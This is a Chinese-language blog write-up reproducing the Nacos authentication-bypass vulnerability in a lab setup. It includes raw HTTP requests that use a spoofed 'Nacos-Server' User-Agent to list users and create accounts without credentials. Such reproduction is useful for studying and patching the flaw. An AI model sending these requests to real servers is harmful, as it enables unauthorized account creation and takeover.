Alibaba Nacos未授权访问漏洞复现

Alibaba Nacos未授权访问漏洞复现

漏洞概述

2020年12月29日，Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。 通过该漏洞，攻击者可以进行任意操作，包括创建新用户并进行登录后操作。

影响版本

Nacos <= 2.0.0-ALPHA.1

环境搭建

下载地址

https://github.com/alibaba/nacos/releases/download/2.0.0-ALPHA.1/nacos-server-2.0.0-ALPHA.1.tar.gz

安装步骤：

解压：tar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz
进入nacos的bin目录：cd nacos/bin
清除windows启动脚本：rm -rf *.cmd
启动单节点模式：./startup.sh -m standalone

访问http://ip/nacos即可看到页面

复现过程

第一步：用burpsuite抓个首页的包或随便其他页面的包，发送至Repeater模块，先修改包试一下能不能成功，修改成如下内容：

GET /nacos/v1/auth/users?pageNo=1&pageSize=100 HTTP/1.1
Host: 192.168.125.96
User-Agent:Nacos-Server
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Origin: http://192.168.125.96
Connection: close
Referer: http://192.168.125.96/nacos/

第二步：未授权创建用户，先在首页用户名和密码处填写上自己想要创建的用户及密码，然后抓登陆的包，抓到后修改包的内容，把http头的/nacos/v1/auth/users/login中的login删掉，改完后内容如下：

再发送

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.125.96
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.125.96
Connection: close
Referer: http://192.168.125.96/nacos/

username=qwe&password=qwe

结果成功如下图：

再用默认账号登陆：
用户名：nacos
密码：nacos
在权限控制-用户列表里发现了新创建的用户，或直接用刚创建的用户登陆即可